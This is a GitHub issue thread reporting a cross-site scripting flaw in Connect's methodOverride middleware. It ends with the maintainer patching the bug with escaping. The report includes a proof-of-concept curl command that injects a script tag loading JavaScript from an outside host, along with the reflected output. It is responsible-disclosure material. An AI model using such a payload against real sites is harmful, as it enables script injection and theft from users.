Security Issue - Cross-Site Scripting with connect.methodOverride() #831

Closed
m13 opened this Issue Jun 27, 2013 · 1 comment

Comments

Projects
None yet
2 participants
@m13

m13 commented Jun 27, 2013

This middleware overwrite req.method with the req.body['_method'] value. When you don't catch the error it responds with a default error msg: "Cannot [METHOD] [URL]" (

res.end('Cannot ' + req.method + ' ' + utils.escape(req.originalUrl));
). Because this is not enough sanitized, you can force a Cross-Site Scripting in the response:

~ curl "localhost:3000" -d "_method=<script src=http://martes13.net/a.js></script>"
Cannot <SCRIPT SRC=HTTP://MARTES13.NET/A.JS></SCRIPT> /

This is very dangerous because in a server like ExpressJS it won't be handled with a app.all('/*', ...), so all servers using this middleware are vulnerable.

To fix this hole, I don't know if it is better to fix the proto.js#L155 or the middleware.

@tj

This comment has been minimized.

Show comment
Hide comment
@tj

tj Jun 27, 2013

Member

I patched with an escape for now but I'll whitelist the methods as well, it's not a huge vulnerability since you can't easily pass around a POST but doesn't hurt to escape, thanks for the report

Member

tj commented Jun 27, 2013

I patched with an escape for now but I'll whitelist the methods as well, it's not a huge vulnerability since you can't easily pass around a POST but doesn't hurt to escape, thanks for the report

@tj tj closed this Jun 27, 2013

@hacksparrow hacksparrow referenced this issue in expressjs/expressjs.com Nov 3, 2014

Closed

List security issues #221

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment